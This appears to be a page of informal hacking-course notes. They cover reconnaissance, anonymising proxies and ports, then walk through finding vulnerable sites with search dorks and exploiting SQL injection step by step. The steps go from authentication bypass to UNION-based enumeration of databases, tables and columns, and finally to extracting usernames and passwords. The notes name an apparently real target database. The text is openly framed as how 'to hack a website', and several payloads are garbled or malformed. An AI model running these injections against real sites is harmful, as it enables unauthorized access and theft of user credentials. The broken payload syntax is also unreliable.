You are on page 1of 3


2.Nslookup - IP from cmd

3.Reverse IP mapping - doamins hosted on the same server

reverse Email lookup toop (you get signal)
search email

4.Info gathering of website using plugin

Apache/ Unix/ Gnix/ Litespeed - LINUx
Microsoft/ IIS/ - WIN OS
glassfish - Java OS

5.Proxy Servers - Opern Servers
www.hidemy*.com - Maintain logs
VPN - Virtual Private Network
http://- 443 - No logs - download vpn client

6.Info gathering using search engine

PORTS - tunnels (65500+)

Physical -USB, Serial Port
Virtual - 1- 65535
https:// - 443
http:// - 80
ftp - 21
smtp - 25
POP - 110

to hack a website (

1.Basic SQL Injection / Authentication BYpass

sunny sunny
select * from member where userid ='sunny'
and password='sunny'
step 1: find out login page of website
pk inurl:/login
pk inurl:/admin
pk inurl:/cpane
pk inuel:/cp intext:username

guessing useselest 1 * from member where userid ='admin, and a

2.Advanced SQL Injection

select - select info from database
insert - insert values into database
update - update values into databse
delete - delete values
create - create table
drop - drop table
order by - sorting columns
schema - structure of data base
' - starting of SQL values/commands
news title:
news content:
news author:
? - asking data from database

step 1: find out link which contains ?id=10

pk inurl:php?id=
pk inural:asp?id=
pk inural:a

step 2: add ' after ?id=10''

blank page = error page = SQL Injection Vulnerable

step 3:find out number of vulnerable links:'
id=1 to id=1000 --
-- : end of query
number of vulnerable links are 8

step 4:find out link from which we can select data:
Id=-1 union all select 1,2,3,4,5,6,7,8 --
we can select data from 2 & 6

step 5:finding out databse, tables & columns

Id=-1 union all select 1,database(),3,4,5,6,7,8 --
DB: citioffi_college
schema - structure of tables & columns
information_schema - stores info
information_schema.tables - table structure
information_schema.columns - column structure
Id=-1 union all select
1, table_name ,3,4,5,6,7,8 from
information_schema.tables --

for complicated websites

Id=-1 union all select
1, table_group_concat(table_name) ,3,4,5,6,7,8 from
information_schema.tables --

table_schema=database() --

for complicated websites

Id=-1 union all select
1, table_group_concat(column_name) ,3,4,5,6,7,8 from
where table_schema='lito_user' --

table: lito_user
columns: Id,Username,Password,FullName,Email

step 6:find out row values

Id=-1 union all select 1,UserName

Id=-1 union all select 1,Password,3,4,5,6,7,8 from lito_user --


SQL Injector